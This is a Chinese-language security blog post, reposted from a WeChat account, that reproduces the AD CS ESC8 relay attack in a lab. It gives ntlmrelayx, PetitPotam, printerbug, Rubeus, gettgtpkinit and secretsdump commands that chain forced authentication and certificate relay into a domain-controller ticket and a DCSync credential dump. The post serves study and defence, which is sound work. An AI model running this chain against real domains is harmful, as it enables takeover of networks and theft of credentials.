域安全|AD CS Relay—ESC8

admin 2022年3月21日11:30:52评论148 views字数 1688阅读5分37秒阅读模式


域安全|AD CS Relay—ESC8

点击上方蓝字关注我们


0x01 前言

国外安全研究人员在6月份已经披露过攻击手法—通过证书进行中继从而来达到攻击域控的目的。

https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/

域安全|AD CS Relay—ESC8


0x02 AD CS作用


1、证书颁发机构(CA):可以向用户、机构和服务颁发证书。

2、CA WEB注册:用户可以通过web浏览器申请证书。

3、联机响应程序服务:联机响应程序服务通过对特定证书的吊销状态申请进行解码,评估这些证书的状态,并发送回包含所申请证书状态信息的签名响应来实现联机证书状态协议 (OCSP)。

4、网络设备注册服务:网络设备注册服务可根据 Cisco Systems Inc. 提供的简单证书注册协议 (SCEP) 允许路由器和其他网络设备获取证书。


0x03 AD CS 配置


配置文章参考:https://blog.csdn.net/xiezuoyong/article/details/22663039


0x04 AD CS 中继攻击


在域内配置好ADCS后 默认会存在一个http站点http://192.168.10.20/certsrv/certfnsh.asp

域安全|AD CS Relay—ESC8

攻击者将用户/机器身份验证中继到 AD CS 服务器并获取用户/机器证书。

一旦攻击者获得证书,攻击者就可以请求用户/机器 TGT 并成为网络上的该用户/机器。


1、本地测试环境


攻击机:192.168.10.1AD主域控:192.168.10.10AD辅域控:192.168.10.20


2、使用 Ex 提供的impacket 进行relay

项目地址:https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack


3、使用 Petitpotam 进行 强制认证

项目地址:https://github.com/topotam/PetitPotam/blob/main/Petitpotam.py


0x05 复现过程


1、查看CA机器

certutil -config - -ping

域安全|AD CS Relay—ESC8


2、ntlmrelayx.py将证书颁发机构 (CA) 设置为中继目标

ntlmrelayx.py -t http://192.168.10.20/certsrv/certfnsh.asp -smb2support --adcs --template 'Domain Controller

域安全|AD CS Relay—ESC8


3、强制机器回联打印机协议触发

#1、Petitpotam.pypython Petitpotam.py -u '' -d '' -p '' 192.168.10.1 192.168.10.10
//python Petitpotam.py -u '' -d '' -p '' "ntlmrelay address" "DC01 address"
#2、printerbug.pypython printerbug.py abc/Yyy:123.com@192.168.10.10 192.168.10.1

域安全|AD CS Relay—ESC8


4、获得CA证书
域安全|AD CS Relay—ESC8

生成的证书会在较长的时间内有效默认一年有效期


5、klist 查看当前用户票据

域安全|AD CS Relay—ESC8


6、注入票据

#Rubeus.exeRubeus.exe asktgt /user:HC$ /certificate:certificatebase64body /ptt

#gettgtpkinit.pypython3 gettgtpkinit.py abc.com/DC2012$ -pfx-base64 MIIRZQIBAzCCES8GCSqGSIb3DQEHAa....... kirbi.ccache
#导入票据export KRB5CCNAME=kirbi.ccache


7、DCsync

secretsdump.py -k win-2016-dc.god.com -just-dc


0x06 参考文章

https://zhuanlan.zhihu.com/p/388384018

https://mp.weixin.qq.com/s/uwqjIpOCgmQVY7fC8NLJyA





域安全|AD CS Relay—ESC8

点个赞,证明你还爱我

原文始发于微信公众号(灼剑安全团队):域安全|AD CS Relay—ESC8

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月21日11:30:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   域安全|AD CS Relay—ESC8https://cn-sec.com/archives/835509.html

发表评论

匿名网友 填写信息